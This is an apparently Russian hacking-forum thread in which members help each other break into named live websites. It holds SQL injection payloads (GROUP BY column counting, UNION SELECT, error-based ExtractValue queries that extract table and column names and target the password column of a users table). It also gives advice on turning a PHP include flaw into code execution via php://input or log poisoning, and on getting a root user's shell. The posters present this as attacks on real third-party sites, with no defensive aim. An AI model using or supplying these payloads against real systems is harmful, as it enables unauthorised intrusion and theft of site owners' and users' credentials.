Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. namez2

    namez2 New Member

    Joined:
    23 Aug 2010
    Messages:
    45
    Likes Received:
    1
    Reputations:
    0
    полей получается 92. (сайт виден)
    вот запрос на 93 выдает (Unknown column '93' in 'group statement')
    вот пример
    Code:
    http://www.mesta-vstrech.ru/mesto.php?id=1+GROUP+BY+93+--+
     
  2. Boolean

    Boolean Elder - Старейшина

    Joined:
    5 Sep 2010
    Messages:
    147
    Likes Received:
    83
    Reputations:
    78
    Code:
    Там под фильтр попадают скобки и запятые.
    http://www.mesta-vstrech.ru/mesto.php?id=1%27+BEGIN:%201%20,%28%29+2+ENDFILTER
    Code:
    BEGIN: 1 2 ENDFILTER 
    
     
    1 person likes this.
  3. namez2

    namez2 New Member

    Joined:
    23 Aug 2010
    Messages:
    45
    Likes Received:
    1
    Reputations:
    0
    А как этим воспользоваться?
    выдается ошибка по синтаксису.. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' BEGIN: 1 2 ENDFILTER LIMIT 1' at line 1

    и как дальше составлять запрос через union select? что то как не составляю все никак...
     
  4. Boolean

    Boolean Elder - Старейшина

    Joined:
    5 Sep 2010
    Messages:
    147
    Likes Received:
    83
    Reputations:
    78
    Говорю же, скобки и запятые попадают под фильтр.
     
  5. namez2

    namez2 New Member

    Joined:
    23 Aug 2010
    Messages:
    45
    Likes Received:
    1
    Reputations:
    0
    ничего уже не поможет?
    пробовал захешировать запятые. все равно эффекта 0
     
    #18205 namez2, 1 Nov 2011
    Last edited: 1 Nov 2011
  6. Boolean

    Boolean Elder - Старейшина

    Joined:
    5 Sep 2010
    Messages:
    147
    Likes Received:
    83
    Reputations:
    78
    Что толку их кодировать то, все равно массив $_GET/$_REQUEST автоматически декодируется.
     
  7. ne0k

    ne0k New Member

    Joined:
    3 Mar 2011
    Messages:
    51
    Likes Received:
    1
    Reputations:
    0
    Человеки, я не силен в php инклудах..

    Подскажите пожалуйста, как быть:

    http://salut.kg/buyer.php?lang=lol


    P.S:
    allow_url_fopen = On
    allow_url_include = Off
     
    #18207 ne0k, 1 Nov 2011
    Last edited: 1 Nov 2011
  8. =strelok=

    =strelok= New Member

    Joined:
    29 Oct 2011
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    помогите роскрутить sql

    sidbank.pl/index.php?option=com_virtuemart&page=shop.browse&category_id=116&Treeid=3&Itemid=100003&lang=en&vmcchk=1&Itemid=100003'
    роскручивал havj не мог найти хеши админа помогите пожалуйста
     
  9. d1v

    d1v Elder - Старейшина

    Joined:
    21 Feb 2009
    Messages:
    716
    Likes Received:
    337
    Reputations:
    120
    помогаю:
    http://forum.antichat.ru/thread43966.html
    http://forum.antichat.ru/thread50600.html
     
    1 person likes this.
  10. Boolean

    Boolean Elder - Старейшина

    Joined:
    5 Sep 2010
    Messages:
    147
    Likes Received:
    83
    Reputations:
    78
    Пробуй инклудить php://input и в тело POST запроса передавать код, который ты хочешь выполнить на сервере.
    Или же ищи логи, access.logs апача, или логи фтп сервера, потом просто инклуд делай. Да что я расписываю то, куча мануалов на эту тему есть.
     
  11. omg_it_glowZ

    omg_it_glowZ New Member

    Joined:
    29 Jan 2011
    Messages:
    38
    Likes Received:
    1
    Reputations:
    -2
    Есть сайтец, на нем у меня неполные права у текущего юзера. Есть файл другого пользователя с правами root, который я могу редактировать, но он html, смогу ли я как-то получить шелл этого пользователя? Если да, то как?
     
  12. crackforme

    crackforme New Member

    Joined:
    3 Oct 2011
    Messages:
    208
    Likes Received:
    1
    Reputations:
    0
    сделал @@version() вышло 5.1.41-3ubuntu12.10

    кто-нибудь сталкивался с таким? какие дальнейшие действия?
     
  13. Boolean

    Boolean Elder - Старейшина

    Joined:
    5 Sep 2010
    Messages:
    147
    Likes Received:
    83
    Reputations:
    78
    Ну крути дальше.
    Фильтруется либо @ либо ( и ), это как повезет.
    Проверь @@version, если получишь результат тот же что и @@version(), то фильтруется скобки. Очевидно же.
     
  14. lion-art

    lion-art Banned

    Joined:
    30 Oct 2011
    Messages:
    37
    Likes Received:
    8
    Reputations:
    1
    Прошу помощи
    инъекция вида:
    index/page/id/1'+union+select+1,2,3,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,
    ответ:
    Invalid query: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
    И далее плохая новость ничего не выходит с числами, сколько бы не подставлял.
    Но есть и хорошая
    index/page/id/1'+union+select+1,2,3,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0'
    в конце кавычка и ответ уже:
    Invalid query: The used SELECT statements have a different number of columns
    Только вот теперь опять затык. Два сайта если вскроем на общее пользование вынесу.
    + сайт с xss есть но об этом позже =)
    если что сайт на Apache/2.2.17
     
    #18214 lion-art, 3 Nov 2011
    Last edited: 3 Nov 2011
  15. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,148
    Reputations:
    886
    ссылку покажи
     
    _________________________
  16. omg_it_glowZ

    omg_it_glowZ New Member

    Joined:
    29 Jan 2011
    Messages:
    38
    Likes Received:
    1
    Reputations:
    -2
    Может немного не в той теме. Хотел узнать:
    Какая программа проверяет ссылки на наличие скули, но не интересуют программы, которые просто ищут ошибку при подстановке " ' ".
    Нужно нечто вроде sqlmap, но способная брать список из файла и не требующая никакого ввода от пользователя (скорость работы не особо важна, главное - качество :3)
    Также устроит, если кто-нибудь подскажет как можно это осуществить через sqlmap :)
     
  17. Kuteke

    Kuteke Banned

    Joined:
    26 Jun 2010
    Messages:
    187
    Likes Received:
    26
    Reputations:
    6
    NetDevilz SQL Scanner в гугл пропиши
     
  18. s000r

    s000r Banned

    Joined:
    28 Sep 2011
    Messages:
    15
    Likes Received:
    0
    Reputations:
    0
    Blind SQL Injection

    Добрый день уважаемые форумчане.
    Помогите разобраться в чем проблема, замучился уже.
    Суть проблемы:
    Дергаю названия таблиц так:
    Code:
    obid=id+and+ExtractValue(1,concat(0x5c,(select+table_name+from+INFORMATION_SCHEMA.tables+LIMIT+0,1)))--
    Такой вид потому что прямого вывода на страницу нету, да и ошибки отображаются только в исходном коде страницы.
    Пошел дальше, получил списки всех таблиц.
    одна из них users
    Получаю название колонок:
    Code:
    obid=id+and+ExtractValue(1,concat(0x5c,(select+column_name+from+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME='users'+LIMIT+0,1)))--
    Получил все нормально.
    Теперь надо выдернуть значения.
    Делаю так:
    Code:
    obid=id+and+ExtractValue(1,concat(0x5c,(select+pass+from+users+LIMIT+0,1)))--
    В ответ получаю:
    Code:
    mysql error: Unknown column 'pass' in 'field list'
    Вопрос, почему говорит что нет такой колонки когда при переборе колонок в таблице users показало что есть pass?

    ЗЫ в это таблице есть еще несколько колонок, одна из них name, ее видит нормально, а все остальные не видит.
     
  19. Kuteke

    Kuteke Banned

    Joined:
    26 Jun 2010
    Messages:
    187
    Likes Received:
    26
    Reputations:
    6
    Мб захексишь?
     
  20. s000r

    s000r Banned

    Joined:
    28 Sep 2011
    Messages:
    15
    Likes Received:
    0
    Reputations:
    0
    Code:
    obid=id+and+ExtractValue(1,concat(0x5c,(select+UNHEX(HEX(pass))+from+users+LIMIT+0,1)))--
    Выдает:
    Code:
    mysql error: Unknown column 'pass' in 'field list'
     
Loading...
Thread Status:
Not open for further replies.